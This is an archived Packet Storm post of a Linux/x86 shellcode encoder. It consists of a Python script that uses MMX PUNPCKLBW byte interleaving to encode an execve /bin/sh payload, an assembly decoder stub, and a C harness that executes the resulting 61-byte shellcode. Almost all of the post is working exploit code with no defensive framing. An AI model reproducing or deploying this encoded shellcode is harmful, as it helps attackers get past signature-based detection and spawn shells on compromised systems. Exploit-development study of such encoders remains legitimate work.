what you don't know can hurt you

Linux/x86 MMX-PUNPCKLBW Encoder Shellcode

Linux/x86 MMX-PUNPCKLBW Encoder Shellcode
Posted Apr 15, 2019
Authored by Petr Javorik

61 bytes small Linux/x86 MMX-PUNPCKLBW encoder shellcode.

tags | x86, shellcode
systems | linux
MD5 | 245a2cc2caaef0f2ee17516eac6ae580

Linux/x86 MMX-PUNPCKLBW Encoder Shellcode

Change Mirror Download
################################################################################
INTRO
################################################################################

# Exploit Title: MMX-PUNPCKLBW Encoder
# Description: Payload encoder using MMX PUNPCKLBW instruction
# Date: 13/04/2019
# Exploit Author: Petr Javorik
# Tested on: Linux ubuntu 3.13.0-32-generic x86
# Shellcode length: 61

################################################################################
ENCODER
################################################################################

#!/usr/bin/env python

# stack execve
SHELLCODE = bytearray(
b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80'
)

# Align to qword multiples
missing_bytes = 8 - (len(SHELLCODE) % 8)
padding = [0x90 for _ in range(missing_bytes)]
SHELLCODE.extend(padding)

# Shuffle payload
shuffled_payload = []
# First byte carries count of needed PUNPCKLBW loops
loop_count = len(SHELLCODE)//8
shuffled_payload.append(loop_count)
for block_num in range(0, loop_count):
current_block = SHELLCODE[(8 * block_num) : (8 * block_num + 8)]
shuffled_block = [current_block[i] for i in [0, 2, 4, 6, 1, 3, 5, 7]]
shuffled_payload.extend(shuffled_block)

# Remove trailing NOPS
for byte in shuffled_payload[::-1]:
if byte == 0x90:
del shuffled_payload[-1]
else:
break

# Print shellcode
print('Payload length: {}'.format(len(shuffled_payload)))
print('\\x' + '\\x'.join('{:02x}'.format(byte) for byte in shuffled_payload))
print('0x' + ',0x'.join('{:02x}'.format(byte) for byte in shuffled_payload))

################################################################################
DECODER
################################################################################

global _start

section .text
_start:

jmp short call_decoder

decoder:

pop edi
xor ecx, ecx
mov cl, [edi]
inc edi
mov esi, edi

decode:

movq mm0, qword [edi]
movq mm1, qword [edi +4]
punpcklbw mm0, mm1
movq qword [edi], mm0
add edi, 0x8
loop decode
jmp esi

call_decoder:

call decoder
EncodedShellcode: db 0x04,0x31,0x50,0x2f,0x73,0xc0,0x68,0x2f,0x68,0x68,0x62,0x6e,0xe3,0x2f,0x69,0x89,0x50,0x89,0x53,0xe1,0x0b,0xe2,0x89,0xb0,0xcd,0x80

################################################################################
TESTING
################################################################################

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\xeb\x1c\x5f\x31\xc9\x8a\x0f\x47\x89\xfe\x0f\x6f\x07\x0f\x6f\x4f\x04\x0f\x60\xc1\x0f\x7f\x07\x83\xc7\x08\xe2\xee\xff\xe6\xe8\xdf\xff\xff\xff\x04\x31\x50\x2f\x73\xc0\x68\x2f\x68\x68\x62\x6e\xe3\x2f\x69\x89\x50\x89\x53\xe1\x0b\xe2\x89\xb0\xcd\x80";

main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*CodeFun)() = (int(*)())code;
CodeFun();
}

################################################################################


Kind Regards
------------------------------

Bc. Petr Javorik
www.mmquant.net
<http://www.mmquant.net/>maple@mmquant.net
Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    13 Files
  • 2
    Jul 2nd
    0 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close